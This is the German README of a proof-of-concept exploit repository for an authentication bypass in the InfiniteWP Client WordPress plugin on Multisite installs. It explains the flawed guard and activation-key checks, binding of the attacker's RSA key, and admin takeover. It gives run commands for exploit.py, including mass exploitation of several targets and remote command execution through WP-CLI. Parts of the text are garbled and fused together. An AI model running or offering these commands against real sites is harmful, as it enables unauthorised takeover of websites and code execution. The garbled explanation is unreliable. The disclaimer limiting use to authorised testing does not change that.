
PoC-Exploit für CVE-2026-15038 im InfiniteWP-Client-WordPress-Plugin: umgeht die Authentifizierung bei Multisite, bindet den RSA-Schlüssel des Angreifers ein, eskaliert zur Übernahme des Admin-Kontos und führt Remote-Befehle über WP-CLI aus.
Unauthentifizierte Übernahme von Admin-Konten in WordPress Multisite
Das InfiniteWP Client-Plugin für WordPress (< 1.13.6) enthält eine kritische Schwachstelle zur Umgehung der Authentifizierung, die Multisite-Installationen betrifft.
Ein nicht authentifizierter Angreifer kann:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() → liest aus der Netzwerkebene (wp_sitemeta)update_blog_option() → schreibt in die Optionen des jeweiligen Blogs (wp_X_options)💥 Ergebnis: Bei Multisite gibt die Schutzabfrage immer false zurück — eine erneute Kopplung ist daher immer möglich.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() gibt false zurückactivation_key → trim(null) → '''' != false → false → Die Prüfung wird bestanden 🎯openssl_verify() wird erfolgreichgraph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| File | Description |
|---|---|
exploit.py | 🐍 Haupt-Exploit-Skript mit Unterstützung für Massen-Exploitation |
requirements.txt | 📦 Python-Abhängigkeiten |
README.md | 📖 Diese Dokumentation |
add_site-Anfragen in den Protokollen überprüfenDieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung besitzen. Die Autoren übernehmen keine Haftung für eine missbräuchliche Verwendung.